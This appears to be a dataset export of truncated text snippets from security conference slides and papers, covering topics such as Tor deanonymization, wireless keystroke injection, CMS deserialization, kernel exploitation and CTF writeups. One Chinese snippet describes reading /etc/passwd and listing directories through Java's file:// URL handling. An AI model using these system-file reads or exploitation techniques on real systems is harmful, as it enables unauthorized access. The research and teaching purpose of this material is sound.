text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
Deanonymizing Tor
Nathan S. Evans
Christian Grothoff
Nathan.S.Evans@du.edu
christian@grothoff.org
Colorado Research Institute for Security and Privacy
University of Denver
1
Motivation
• Tor is probably the most popular and widely used free software
P2P network used to achieve anonymity on the Internet:
– Tor has a stro... | pdf |
Sound Effects
Exploring acoustic cyber-weapons
Matt Wixey
August 2019
All references cited are at the end of the slide deck,
available on the DEF CON media server!
PwC
• Research Lead for the PwC UK Cyber Security practice
• PhD student at UCL
• Previously worked in LEA doing technical R&D
• Black Hat USA, DEF CON, IS... | pdf |
漏洞描述
⽇常逛zdi发现的洞,Orckestra C1 CMS 6.10存在 .net 反序列化漏洞,需要登录,成因是因
为 TypeNameHandling.Auto
环境搭建
下载 https://github.com/Orckestra/C1-CMS-Foundation/releases/download/v6.10/C1.CMS.6.10.zip
然后Visual Studio打开运⾏。
分析
根据cve描述和补丁对⽐发现漏洞点存在于Composite.dll,使⽤github的对⽐发现在此commit中增加了对反序列
化绑定类型的校验。
https://github.com/Orckestra/C1-CMS-Found... | pdf |
Industrial Cybersecurity Landscape in 2020:
Trends, Challenges, and Opportunities
Dr. Terence Liu
VP-GM, Trend Micro and TXOne Networks
All product names, logos, and brands are property of their
respective owners. All company, product and service names
used in this deck are for identification purposes only. Use of ... | pdf |
HCTF Writeup
队伍名:Albertchang
Web 部分
Injection
看了下 cookie,发现 base64,解密:
看了好久没看得明白。主办方放了 Hint,是 Xpath 注入。百度之,在文库发现了一篇文章,
测试了下:
发现有回显
谷歌找到了一篇文章,经过尝试最终构造出 payload
confused question
右键源码,发现 login.php.txt
提交一次我们可以发现:
而 parse_str 这一个函数会对内容进行两次 url 编解码。
大致意思是让我们绕过其中癿函数,以 admin 身份迚行提交 pasword,也就是我们只要是
admin 身份就可以,而 ... | pdf |
Making (and Hacking) the DEFCON 17 Badge
by Joe Grand aka Kingpin
Me.
electrical engineer.
hardware hacker.
daddy.
Last Year
This Year
Hackers: The Next Generation
Introduction
Hardware
Firmware
Manufacturing
DEFCON 17 Haiku
Joe Grand aka Kingpin
Electronic badge
Audio input
Affects LED output
Sound and light combin... | pdf |
Ghost Telephonist
Impersonates You Through LTE CSFB
Yuwei ZHENG, Lin HUANG Qing YANG, Haoqi SHAN, Jun LI
UnicornTeam, 360 Technology
July 30, 017
Who We Are
• 360 Technology is a leading Internet security company in China. Our
core products are anti-virus security software for PC and cellphones.
• UnicornTeam (h... | pdf |
DevSecOps标准解读
中国信通院云大所 牛晓玲
牛晓玲
中国信息通信研究院
云计算与大数据研究所 云计算部 副主任
DevOps标准工作组组长,DevOps 国际标准编辑人。长期从事云计
算领域开发运维研究的相关工作,包括云服务业务功能测试以及运维
管理系统审查等相关工作。参与编写《云计算服务协议参考框架》、
《对象存储》、《云数据库》、《研发运营一体化(DevOps)能力
成熟度模型》系列标准、《云计算运维智能化通用评估方法》等多项
标准20余项。参与多篇白皮书、调查报告等编制工作,包括《企业IT
运维发展白皮书》、《中国DevOps现状调查报告(2019年)》等。
参与评估DevOps能力成熟度评估超过40个项目,具有丰富... | pdf |
MAELSTROM
Shane Steiger
Attack Lifecycle Game Concept
version .8
© 2016
‘Are You Playing
with a Full Deck?’
#cybermaelstrom
github.com/maelstromthegame
MAELSTROM: AN ATTACK LIFECYCLE GAME CONCEPT
Maelstrom is a game concept and model meant to enable Education, Demonstration and
Evangelism within Cyber Securi... | pdf |
TAKING WINDOWS 10 KERNEL
EXPLOITATION TO THE NEXT
LEVEL – LEVERAING WRITE-
WHAT-WHERE VULNERABILITIES
IN CREATORS UPDATE
Whoami
• Morten Schenk
• Security Advisor, Improsec ApS
• Twitter - @blomster81
• Blog: https://improsec.com/blog/
• GitHub: https://github.com/MortenSchenk
• What to expect from this talk
• Windo... | pdf |
http://null.co.in/
http://nullcon.net/
http://null.co.in/
Jugaad
Linux Thread Injection Kit
By Aseem Jakhar
$whoami
● A Big Hello from India.
● Founder – null The open security community.
● Organizer – nullcon security conference.
● Chief researcher – Payatu Labs
http://www.payatu.com
● Speaker at various security con... | pdf |
Catching)Malware)En)Masse):)DNS)and)IP)style!
!
Dhia!Mahjoub!dhia@opendns.com!@DhiaLite!!
Thibault!Reuille!thibault@opendns.com!@ThibaultReuille!!
Andree!Toonk!andree@opendns.com!@atoonk!!!!
Part!1:!Catching!Malware!DNS!style!
!FasFlux!botnets!as!proxy!networks!
Part!2:!Catching!Malware!IP!style!
!ASN!graph!
!Suspiciou... | pdf |
Lost and Found
Certificates
Ian Foster & Dylan Ayrey
Who We Are
Ian
Information Security Engineer
CertGraph
https://dns.coffee
https://lanrat.com
https://github.com/lanrat
@LANRAT
Dylan
truffleHog
WPA2-HalfHandshake-Crack
Pastejacking
Other stuff…
https://github.com/dxa4481
dylanayrey@gmail.com
The Problem
A certifica... | pdf |
Bluehat Shanghai 2019 |
David “dwizzzle” Weston |
Microsoft OS Security Group Manager
不断增强的 Windows 安全性
早上好 上海!
PC 上的 Windows
熟悉的桌面体验
庞大的硬件生态
桌面应用兼容性
One Core OS
基础操作系统
应用和设备平台
运行时和框架
Xbox 上的 Windows
Windows 10 界面体验
独特的安全模型
共享的游戏体验
IoT 中的 Windows
基础操作系统
应用和设备平台
运行时和框架
还有更多地方……
适配不同形态设备
界面体验
支持不同设备场景
Windows 正在不断进化……
恶... | pdf |
Karl Koscher – @supersat
Eric Butler – @codebutler
Rev: July 8, 2013
Updated slides available from defcon.org and http://simhacks.github.io/
Applications live on your SIM card
Phones are dumb hosts – UI and
connectivity only
Telcos own the SIMs, so they control the
applications
2
These are cal... | pdf |
1
(SSDLC)
TWISC@NCKU
2
(SSDLC)
3
1-1
1-2
4
1-1
5
(System Development
Life Cycle, SDLC)
–
(Define)
•
6
–
(Design)
•
–
(Develop)
•
7
–
(Test)
•
–
(Deploy)
•
8
–
(Maintain)
•
–
(Change)
•
XXX…
YYY…
9
SDLC v.s. SSDLC
SDLC
–
–
SQL Injection…
SSDLC
–
10
11
1-2
12
12
Web
Web
––
(SSDLC)
(SSDLC)
13
2-1
2-2
2-3
2-4
2-5
2-6
2-7
... | pdf |
猫 鼠 游 戏
如 何 进 行 W i n d o w s 平 台 在 野 0 d a y 狩 猎
金权 安恒信息
自我介绍
➢ 金权(@jq0904/银雁冰)
➢ 安恒信息猎影/卫兵实验室高级安全专家
➢ 研究方向
•
Windows平台漏洞挖掘与利用
•
Windows平台在野0day狩猎
➢ 演讲经历
•
Black Hat USA 2022
•
HITB Amsterdam 2021
•
Blue Hat Shanghai 2019
➢ 40+ Microsoft/Adobe CVE致谢 (7次在野0day致谢)
➢ 2020~2022 MSRC TOP 100
目录
1. 背景
2. 用不同的方法解决不同的问题
➢ 为什么... | pdf |
1
Java⼩trick之利⽤URL的file协议列⽬录
LxLN 前⾔
LxLO 正⽂
LxLP debug跟踪
LxLQ 总结
这个技巧感觉挺有意思,还是在微信群⾥的赛博回忆录,讨论的时候看到的⼀篇⽂章
0x01 前⾔
2
接着和钧钧讨论的时候发现作者是这样玩的
感觉挺有趣,深深的破坏了我对file://这个协议的看法
以前⼀直以为只能读⽂件,没想到在java⾥⾯还能读⽬录,特记录⼀波
0x02 正⽂
3
Plain Text
复制代码
平时我对file协议就是读⽂件
也就是类似file:///etc/passwd这样
但是在看那个⽂章的时候
看到作者是类似这样玩的file:///etc/
然后钧和我也试了⼀下,并且... | pdf |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
WO
IN THE UNITED STATES DISTRICT COURT
FOR THE DISTRICT OF ARIZONA
MDY Industries, LLC,
Plaintiff/Counterdefendant,
vs.
Blizzard Entertainment, Inc.; and
Vivendi Games, Inc.,
Defendants/Counterclaimants.
__________________________________
Bli... | pdf |
MouseJack: Injecting Keystrokes into
Wireless Mice
Marc Newlin / marc@bastille.net / @marcnewlin
Marc Newlin
Security Researcher @ Bastille Networks
Agenda
1.
Overview
2.
Research Process
3.
Protocols and Vulnerabilities
4.
Vendor Responses
5.
Demo
1. Overview
Types of Vulnerabilities
● Forced Device Pairing
● Keystr... | pdf |
Cyber-hijacking Airplanes:
Truth or Fiction?
Dr. Phil of Bloomsburg University
@ppolstra
http://philpolstra.com
Captain Polly of University of <redacted>
@CaptPolly
Why This Talk?
● Lots of bold claims concerning the
feasibility of cyber-hijacking
● Bold claims get lots of press
● Most people don't know enough to
ev... | pdf |
42
2020年12月 第 12 期(第33卷 总第280期)月刊
2020 年 第 12 期
电信工程技术与标准化 中国移动网络与信息安全专题
基于IPv6的资产管理系统概要设计与实现
李江1,李肖肖1,安宝宇2,付俊1,何申1
(1 中国移动通信有限公司研究院,北京 100053;2 中国移动通信集团公司信息安全管理
与运行中心,北京 100053)
摘 要 IPv6具备海量的地址空间,地址生成随机性强,对IPv6网络空间中的资产进行管理将面临许多新的挑战。本
文吸取了业界IPv6存活地址快速发现理论的核心思想,结合现在的网络特点,设计开发出基于IPv6的资产管
理系统,用于辅助对IPv6资产进行管理。
关键词 IPv... | pdf |
MOSE: Using
Configuration
Management for Evil
Presented By: Jayson Grace
Legal Stuff
I am not speaking on behalf of my employer (or any
previous employers), nor am I here as a representative of
my current or previous employers.
My opinions do not reflect those of my current or
previous employer, and are solely my ... | pdf |
apache
0x00
apacheapache
0x01
apache
per-servervirtualhost
per-directorydirectorylocationfile
apache
0x02
mod_proxy
AP_DECLARE_MODULE(proxy) =
{
STANDARD20_MODULE_STUFF,
create_proxy_dir_config, /* create per-directory config structure */
merge_proxy_dir_config, /* merge per-directory config s... | pdf |
Maelstrom: Are you playing with
a full deck?︎
Using an Attack Lifecycle Game to Educate,
Demonstrate and Evangelize︎
!
#cybermaelstrom︎
Shane Steiger, Esq. CISSP︎
Shane Steiger © 2016︎
DEF CON 24︎
$ whoami︎
~ messing with computers since 1989 - TIN, PINE, yTalk, Lynx, MUDs,
etc. ︎
~ 8 years in a large food manufactu... | pdf |
互联网企业安全建设实践
北京站/3.29
靳晓飞
VIPKID安全中心
从这里说起
互联网企业安全建设整体思路
互联网企业面临安全挑战分析
互联网企业核心安全目标
互联网企业核心安全能力建设与提升
互联网企业整体安全视角
互联网企业基础安全体系建设框架
互联网企业安全建设蓝图
互联网企业安全建设如何落地实施
分阶段安全体系建设
如何评价企业安全建设的效果
基础安全全链路纵深防御架构
API 安全监控实践
需要对哪些API进行安全监控?
• 注册接口
• 登录接口
• 找回密码接口
• 订单详情接口
• 收货地址接口
• 其他所有可能会被刷的API
安全监控目标设定
• 具备对高风险API被刷的分钟级主动发
现和感知能力,并可与安全防... | pdf |
• What is it?
• Why do it?
• Who does it?
• Dark Clothing
- Black.
- Dark Blue.
• No Flashy Logos
- Nothing that will single you out.
- Nothing Large.
- If you must have logos, support your
police.
• Footwear
- Thick Soles.
- Hiking Boots.
- Combat Boots.
- Dr. Marten Style.
• Disposable
- Old clothes.
- Thick Pants.... | pdf |
英⽂文地址
翻译:blood_zer0、Lingfighting
如果翻译的有问题:联系我(Lzero2012)。匆忙翻译肯定会有很多错误,欢迎⼤大家⼀一起讨论Go语⾔言安全能⼒力力建设。
Go语⾔言-Web应⽤用程序安全编码实践是为了了给任何使⽤用Go进⾏行行编程与Web开发的⼈人员提供指导。
这本书是Checkmarx安全研究团队共同努⼒力力的结晶,它遵循OWASP安全编码实践快速参考指南。
这本书主要的⽬目的是为了了帮助开发⼈人员避免常⻅见错误,同时通过"实践⽅方法"学习编程语⾔言⼼心得。本书提供了了关于"如何安全执⾏行行"详细信息,展示了了在
开发过程中可能出现的安全问题。
Checkmarx是⼀一家应⽤用程序软件安全公司,公... | pdf |
Phishing and Online Scams
in China
Joey Zhu
Trend Micro Inc.
Who I am:
• Worked for Trend Micro Inc. (2005 – Present)
• Rich experience with virus sandbox (2005 – 2008)
• Rich experience as a JavaScript analyzer
(2008 – Present)
• Web threat expert, focusing on HTML/Javascript
exploits
• Now interested in phi... | pdf |
DEFCON!
2015!
Introduction to SDR &
the Wireless Village !
Who the Frig...!
satanklawz!
!
DaKahuna!
It takes a village...!
Rick Mellendick!
Zero_Chaos!
Marauder!
Terrible!
!
RedBaron!
SimonJ!
Spiral Suitcase!
0xAA!
Agenda for the next 45 minutes!
● Ham Radio Transceivers!
● SDR Rx/Tx!
● Antenna Theory from Ham to SDR ... | pdf |
Browser Script Engine
Zero Days in 2018
Elliot Cao
Trend Micro
2019-05-30
Whoami
• Previous occupation is electrical engineer
• Joined in Trend Micro in 2017
• Sandbox developer
• Started browser vulnerability research in 2018
• Focus on browser script engine
• Lei Cao (@elli0tn0phacker)
Agenda
• Browser Zero Days in ... | pdf |
& Privileged&Confidential
01
•
• 82
5 Privileged&Confidential
5 Privileged&Confidential
0
& 2
Privileged&Confidential
Privileged&Confidential
&
01
T Privileged&Confidential
T Privileged&Confidential
•
O% & S1
S&
•
05
R1
•
0pC
1P
4Op
•
t4aC81
Privileged&Confidential
Privileged&Confidential
&
02
Privileged&Confide... | pdf |
Hackers and Disasters:
How To Reboot Society With Style On A
Budget
Brad “RenderMan” Haines
Hacker / Security Consultant
RenderLab.net, Churchofwifi.org, NMRC.org
render@renderlab.net
Defcon 17
July 31st – August 2nd, 2009
Las Vegas, Nevada
http://www.renderlab.net/projects/presentations
So You Survived The Apocalyps... | pdf |
百度数据中心自动化平台演进
百度系统部
高级项目经理
陆川
2015-04-24
目录
IDC自动化平台的定义
1
2
3
百度IDC自动化平台演进
IDC自动化平台的未来
IDC内部
百度IDC运营平台
分布式集群
Web/DB
业务监控
部署
上线
业务运维
IDC运营平台
资源管理
容量管理
监控报警
资源管理
网络
交换机上架
服务器
上架
DNS
负载均衡
初始化
故障处理
供电
空调
冷机
机房
。。。
。。。
。。。
变更管理
百度IDC自动化平台-why
• 百度每年在IDC上的投入?
• 上架交付3000台机器需要多长时间?
百度IDC自动化平台-why
2010
2011
2012
2013
2014
百度服务器... | pdf |
自 动 化 漏 洞 扫 描 系 统 开 发 和 应 用
李斌
系 统 建 设 背 景
Ø 互联网应用系统大量使用开源软件和应用组件,且系统迭代快,可能
存在各种安全漏洞,依靠手工检测需要投入大量人力。
Ø 通过建设自动化漏洞扫描系统,实现安全资产统一管理、漏洞自动化
检测和安全漏洞生命周期管理,提升漏洞发现效率和能力,降低漏洞
被利用风险。
系 统 建 设 目 标
ü IP和端口
ü 中间件及版本
ü 组件库及版本
ü 数据库
ü 进程
ü 运行用户
ü 域名和URL
ü 端口开放
ü 系统和中间件漏洞
ü 弱口令、未授权访问
ü Web安全漏洞
ü 漏洞确认
ü 漏洞复核
ü 漏洞跟踪和管理
ü 统计和报表
安全资产
管理
漏洞自... | pdf |
Irongeek.com
Adrian Crenshaw
Irongeek.com
I run Irongeek.com
I have an interest in InfoSec
education
I don’t know everything - I’m just a
geek with time on my hands
(ir)Regular on the ISDPodcast
http://www.isdpodcast.com
Researcher for Tenacity Institute
http://www.tenacitysolutions.com
Irongeek... | pdf |
Breaking Wind:
Adventures in Hacking
Wind Farm Control Networks
Jason Staggs, Ph.D.
University of Tulsa
Tulsa, Oklahoma
whoami
• Security researcher
– Focused on control systems and network security
• PhD in Computer Science from The University of Tulsa
– Cellular networks, security engineering and forensics
• Presen... | pdf |
利用AI检测隐蔽的C2通信
AI for Detecting Covert C2 Communication
背景
0 1
C2技术发展
明文传输
加密混淆
公共协议(如TLS)
正常服务(如Twitter)
行业统计
2020年,加密的C2通信已达70%。
——Cisco
2020年Q1,67%的加密C2采用的TLS协议
——WatchGuard
防的策略
0 2
检测手段
局限
签名特征
难以应对
加密载荷
统计规则
不精确
机器学习模型
鲁棒性低
过拟合
最具
前景
应用AI的难点
0 3
C2样本
1. 辨识度低
2. 数据量少
3. 特征维度少
4. 随机性强
Cisco的成功经验
0 4
TLS协议
TLS握手特征
Cl... | pdf |
Raw Linguist Analysis and Word Count Output for Big Five and Dark Triad traits
Talk Title : Can Twitter help expose psychopath killer’s traits
Presenters: Chris Sumner & Randall Wald
Abstract:
Recent research has identified links between Psychopaths and the language they use (Hancock et al 2011), with media reports... | pdf |
The End of the PSTN As You Know It
DEF CON 20
July 28, 2012
Agenda
“Islands of VoIP”
Tool release
UC Federation
Surprise UCF Vendor Research
Open Source Software
Avaya Proprietary - Do not reproduce or distribute without express written consent
Small Disclaimer
These are our opinions based on experience
Not... | pdf |
CTF-WP-Nu1L
CTF-WP-Nu1L
WEB
Game
who_are_you?
show_me_your_image
PWN
PWN1
PWN2
MISC
24word
Reverse
Flat
srcleak
py
Crypto
sm4
dp
WEB
Game
who_are_you?
xxe
show_me_your_image
34
aaa.png/aaaaaa.png/aaaaaaaaa.png
hint…/root/flag.txt
# coding: UTF-8
import base64
import requests
import urllib
import re
PWN
PWN1
url="http://... | pdf |
优化ARL的⼀些坑的细节
0x00 前⾔
这篇⽂章主要是针对前⾯那篇关于漏扫优化的具体实践,实践时候也碰到了⼀些预想不到的问题包
括⼀系列ARL⾃身的bug问题。觉得有必要记录⼀下,也避免哪天硬盘挂了没备份忘记了怎么修改
的。
0x01 如何部署和调试代码
我通常是不进⾏单步调试的,毕竟ARL是python写的,有报错看报错,然后打印打印关键信息基本
我就知道哪⾥有问题要怎么改了。
我按照官⽅的安装⽅式是⼀键部署的docker版本,通过docker-compose来进⾏管理。
可以看到分为好⼏个容器,除了db和mq,剩下三个应该都是有具体ARL代码的。⽽我们前⾯所说
的例如增加host碰撞、增加扫描等实际上都是在arl_wor... | pdf |
mdns
0x00
0x01 systemd-resolved
ip.dst_host==224.0.0.251 and udp.port==5353
0x02 mdns
systemd-resolve
resolvectl
avahi-*
0x03 | pdf |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
... | pdf |
PENTEST
ETO(200)
学到了姿势,盲注还可以这么搞= =测试了几发,发现是 xpath 的注入:
然后爆破不出来,根据提示说要利用可见字符,于是学到新技能:
就是利用:
测试
http://eto.sctf.xctf.org.cn/?action=user&id
=6 or count(//user)=5(确认user节点存在)
http://eto.sctf.xctf.org.cn/?action=user&id=6 or
count(//user/password)=5(确认password字段
存在)
http://eto.sctf.xctf.org.cn/?action=user&id=6 or
str... | pdf |
议题:
WebLogic XMLDecoder 反序
列化之殇
演
讲人:
谢
小强
ID:
Badcode
部
门/职
位:
404实验室/安全研究员
研究方向:
Web 安全
标签
:
Java
Blog:
https://badcode.cc/
帅
什么是 XMLDecoder ?
01
02
03
XMLDecoder 解析
流
程
XMLDecoder 反序
列化安全风
险
04
WebLogic 中的 XMLDecoder 漏
洞
01
什么是 XMLDecoder ?
XMLEncoder
• 是 ObjectOutputStream 的互补替换
• 将 Java 对象转换成 XML
Test.xml
void标签... | pdf |
笔记本:
用户运营
创建时间:
2020/4/4 11:24
更新时间:
2020/4/4 12:32
作者:
邵云蛟
URL:
https://mp.weixin.qq.com/s/qgChhHyfle0DXBMTsm-vtQ
星球圆桌:如何提升社群活跃度?
分享人:邵云蛟
旁友圈PPT学习社群创建者
之前受知识星球运营采访,聊了一些如何提升社群活跃度的方法,后来,在运营的过程中,又有
了一些新的想法,在这里分享一下。
如果你经常看星球活跃榜,会发现旁友圈 PPT 学习社群,经常会出现在前3名之中,截止到目
前,星球定价365元,人数已经超过了25000人,主题数超过40000条,评论数近16W条,应该算
是比较活跃了,对吗?
那... | pdf |
Win at Reversing
API Tracing and Sandboxing through
Inline Hooking
Nick Harbour
2
Agenda
Reverse Engineering Primer
Approaches to Dynamic Analysis
Inline Hooks
Advantages Over Other Techniques
Usages
3
Reverse Engineering Primer
Reverse Engineering techniques can be
devided into two categories: Static and... | pdf |
Self-Publishing and the
Computer Underground
DEFCON 15 • 4 August 2007
Myles Long
Director of Depravity, CULT OF THE DEAD COW
myles@cultdeadcow.com • http://www.cultdeadcow.com/
Christian “RaD Man” Wirth
Founder, ACiD Productions; Member, cDc’s Ninja Strike Force
radman@acid.org • http://www.acid.org/
Rob “Flack” O’Har... | pdf |
浅谈syscall
Author:⽩袍
⼀、简介
Syscall 即 system call ,是最近在红队领域⽐较热⻔的⼀种⼿法,主要⽤来规避AV、EDR类
的设备检测。
Windows有两种处理器访问模式:⽤户模式和内核模式。使⽤Ring级来描述就是⽤户模式为
Ring 3,内核模式为Ring 0,如图:
⽤户的代码运⾏在⽤户模式下,⽽驱动程序和操作系统代码运⾏在内核模式下,两者相互隔
离,避免⽤户级别的代码影响到操作系统的稳定。
⽤户在调⽤⼀些与系统相关的API函数时,实际上是先从⽤户模式切换到内核模式,调⽤结束
后再回到⽤户模式,通过 Process Monitor 可以看到这个过程:
⽤户代码调⽤ CreateFile()... | pdf |
1
php⽂件上传处理流程简单分析-php在流量层⾯
绕waf的姿势
boundary值处理
body处理
filename的特殊处理
作者:⽩帽酱
php⽂件上传处理在 main/rfc1867.c 中的 rfc1867_post_handler函数
测试环境 PHP 7.1.9
boundary值处理
2
SAPI_API SAPI_POST_HANDLER_FUNC(rfc1867_post_handler)
C
复制代码
if (SG(post_max_size) > 0 && SG(request_info).content_length >
SG(post_max_size)) {
sapi_modul... | pdf |
Jenkins
PCIWriteUP
println'"bitsadmin'/rawreturn'/transfer'getfile'https://xxxxxx.myqcloud.com/beacon.exe'C:\
\\Windows\\Temp\\beacon.exe".execute().text
tomcat
4imagesgetshell
<?php'$_GET[a]($_GET[b]);?>
https://10.10.6.188/search.php?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%2
9,base64_decode%... | pdf |
Telerik.Web.UI for ASP.NET AJAX某版本存在
任意文件下载漏洞:
在做渗透测试任务时,遇到一个ASP.NET站点.通过目录扫描发现存在
Telerik.Web.UI.WebResource.axd 路径。此路径是第三方控件 Telerik UI FOR ASP.NET
在 web.config 中映射的 handler
查阅历史相关漏洞后主要有以下
CVE 2014-2217
CVE-2017-11317
CVE-2017-11357
CVE-2017-9248
CVE-2019-18935
上面这几个已知漏洞基本都是围绕默认 key 实现序列化配置类上传恶意文件,后者是前
者禁用 ../ 后... | pdf |
1
Intelligent Debugging
for Vulnerability Analysis and
Exploit Development
Security Research
2
Who am I?
● Damian Gomez, Argentina
● Being working @ Immunity since early
2006
● Security Research focusing on:
– Vulnerability analysis
– Exploit development
● VisualSploit lead developer
● Main developer of Immunity De... | pdf |
RWCTF
Nu1L
forensics
ccls-fringe
{
"last_write_time":1532281822000000000,
"language":2,
"lid2path":[
],
"import_file":"/home/flag/fringe.cc",
"args":[
"%clang",
"/home/flag/fringe.cc"
],
"dependencies":[
"/usr/include/c++/8.1.1/ext/atomicity.h",
"/usr/include/asm-generic/... | pdf |
ModScan
A SCADA MODBUS Network Scanner
Mark Bristow
mark.bristow@gmail.com
Agenda
• Brief introduction to SCADA Systems
• The MODBUS Protocol
• MODBUS TCP
• ModScan Demonstration
• ModScan Project Information
• Q&A
Disclaimer
• The material in this presentation is to be
used for authorized security scanning/
auditing... | pdf |
Struts2 组件安全概览 (Skay)
Skay@Ateam
⼀、组件概述
1.关键词
框架、MVC、Java Web
2.概述
struts2是基于MVC设计模式的Java Web框架技术之⼀,struts2框架按照MVC的设计思想把
Java Web应⽤程序分为控制层,包括核⼼控制器FilterDispatcher和业务控制器Action,模型
层,包括业务逻辑组件和数据库访问组件,视图层,包括HTML、JSP、struts2标签等,也
可以认为struts是⼀个⼤的servlet。
关于Xwork
XWork是⼀个标准的Command模式实现,并且完全从web层脱离出来。Xwork提供了很多核
⼼功能:前端拦截机(inte... | pdf |
Xprobe
Remote ICMP Based OS Fingerprinting Techniques
Ofir Arkin
Managing Security Architect
© 2 0 0 1 @ S T A K E , I N C .
2
Agenda
What is Xprobe?
Xprobe 101
Examples
The Static Engine
The Signature Based Engine
More Examples
Known Problems, Detecting Xprobe’s Activity, To Do List
Questions
©... | pdf |
2020-2021年
元宇宙发展研究报告
@新媒沈阳 团队
王儒西 博士后
向安玲 博士生 主笔
0.98版
2021.09.1
6
理念篇
目
录
1. 孕育元宇宙
2. 元宇宙是什么?
3.虚拟与现实的关系
4. 元宇宙的理论框架
5. 对元宇宙的几点展望
1 孕育元宇宙
元宇宙前传:《雪崩》
元宇宙概念的提出:
1992 年,Neal Stephenson的科幻小说《Snow Crash》中提
出 了 “metaverse(元宇宙,汉译本译为“超元域”)”和“化身
(Avatar)”这两个概念。书中情节发生在一个现实人类通过
VR设备与虚拟人共同生活在一个虚拟空间的未来设定中。
元宇宙前传:《雪崩》
现在,阿弘正朝「大... | pdf |
THE JOP ROCKET: A SUPREMELY
WICKED TOOL FOR JOP GADGET
DISCOVERY, OR WHAT TO DO IF
ROP IS TOO EASY
Dr. Bramwell Brizendine
Dr. Joshua Stroschein
DEF CON 27
August 9, 2019
DR. BRAMWELL BRIZENDINE
• Assistant Professor of Computer and Cyber Sciences
at Dakota State University.
• Creator of the JOP ROCKET.
• Interests... | pdf |
The Art of Software Security
Assessment - Identifying and
Preventing Software
Vulnerabilities
The Art of Software Security Assessment - Identifying and Preventing Software Vulnerabilities
1
目录
1. The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities .... 6
2. Table of Cont... | pdf |
How to Hack Your Mini Cooper: Reverse Engineering CAN
Messages on Passenger Automobiles
Jason Staggs
University of Tulsa
Institute for Information Security
Crash Reconstruction Research Consortium
jason-staggs@utulsa.edu
ABSTRACT
With the advent of modern vehicular technology, the
computerized components of p... | pdf |
A New Era of SSRF - Exploiting URL Parser in
Trending Programming Languages!
Orange Tsai
Taiwan No.1
About Orange Tsai
The most professional red team in Taiwan
About Orange Tsai
The largest hacker conference in Taiwan
founded by chrO.ot
About Orange Tsai
Speaker - Speaker at several security conferences
Black Hat USA,... | pdf |
Church of WiFi
Wireless
Extravaganza
Today’s Brethren:
Thorn
theprez98
Renderman
Who Are The CoWF?
Q: Pirates? Ninjas? Pirates
with stealthy Ninja skills?
Ninjas who say "Arrgh"?
A #1: A “Church” where they
do “WiFi Voodoo”
Who Are The CoWF?
A #2: A bunch of Monkeys
who wear Pope hats
The Problem…
The Problem…
• No ski... | pdf |
漏洞原理:当开启了分片上传功能时,fastadmin 会根据传入的 chunkid ,结合硬编码后缀来命名和
保存文件,攻击者可预测文件上传路径;此后攻击者提交 "分片合并" 请求时,fastadmin 将会根据传入
的 chunkid ,去除了上一步操作中文件名的硬编码后保存新文件,导致任意文件上传。
前期准备
1. 该接口至少需要普通用户权限,我们可以先在前台注册一个用户然后登录
2. 需要修改默认配置 才能使用分片上传功能。设置 application/extra/upload.php 下的
chunking 项为 true
3. 可使用 application/index/controller/Ajax 下的 u... | pdf |
©2003-2007 Check Point Software Technologies Ltd. All rights reserved. Proprietary and confidential.
puresecurity
“A Crazy Toaster :
Can Home Devices turn against us?”
“A Crazy Toaster :
Can Home Devices turn against us?”
Dror Shalev
SmartDefense Research Center
drors@checkpoint.com
2
©2003-2007 Check Point Softwa... | pdf |
1
⽆java环境修改字节码
@yzddmr6
⾃从实习之后发现⾃⼰缺乏的东⻄还有很多,跟其他优秀的⼈相⽐还有很⼤的差距,所以最近⼀直在学习
充电,⽂章也写的少了。上次巅峰极客线下赛跟yan表哥⾯了基,⼀起磕了⽠⼦聊了聊天。结合当时的⽐赛
情况回来之后想搓⼀个蚁剑的后渗透插件,今天想跟⼤家分享⼀下其中的⼀个点:⽆java环境如何修改字
节码。
在蚁剑改造计划之实现JSP⼀句话中,当时为了解决硬编码字节码的问题采⽤了额外参数的⽅式来传参。
但是同时带来的问题就是键名的固定跟额外带来的编码问题,很容易成为⼀个特征。
例如
蚁剑没有java环境,所以没办法像冰蝎⼀样调⽤asm框架来修改字节码。但是我们也不需要asm框架那么
强⼤的功能,实... | pdf |
Pentesting ICS 101
By Arnaud SOULLIE
Who am I?
Arnaud
soullié
Senior security auditor
Windows Active Directory
Can a Windows AD be secured ? JSSI 2014
(French, sorry)
SCADA (BHEU14, HIP15, BruCon, BSLV15,
DC24)
Wine tasting / Motorbike riding
(we’re not going to talk about it today)
Sorry for the Fre... | pdf |
EXTRACTING CNG TLS/SSL ARTIFACTS FROM LSASS MEMORY
Jake Kambic
2016
Defcon
ii
TABLE OF CONTENTS
Page
LIST OF TABLES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
iv
LIST OF FIGURES
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
v
LIST OF ACRONYMS & ABBREVIATIONS . . . . . . . . . . . . ... | pdf |
Chip & PIN is definitely broken
Credit Card skimming and PIN harvesting
in an EMV world
Andrea Barisani
<andrea@inversepath.com>
Daniele Bianco
<daniele@inversepath.com>
Chip & PIN is definitely broken v1.3
Copyright 2011 Inverse Path S.r.l.
Adam Laurie
<adam@aperturelabs.com>
Zac Franken
<zac@aperturelabs.com>
What... | pdf |
…
’
?
•
’
?
•
•
’
?
•
•
•
’
?
•
•
•
•
’
?
•
•
•
•
’
?
•
•
•
•
•
…
•
•
•
•
–
•
–
•
–
–
•
–
–
•
–
–
•
–
•
–
–
•
–
•
–
–
•
–
•
–
–
•
–
•
–
–
•
–
–
•
–
–
•
–
–
•
–
–
•
–
–
•
•
–
–
•
–
–
•
– | pdf |
Crisis Intervention Documentation & Suicide Risk Assessment
Immediate State
Suicide in progress Call 911 immediately & ascertain location
Influence of drugs / alcohol If yes, list: _____________________
Potential suicide methods nearby
Self harm in progress / just completed
Suicidal Ideation & Intent ... | pdf |
Metamorphic
Viruses
Sean O‟Toole
Metamorphism Defined
“Body-polymorphics” (Szor, 127)
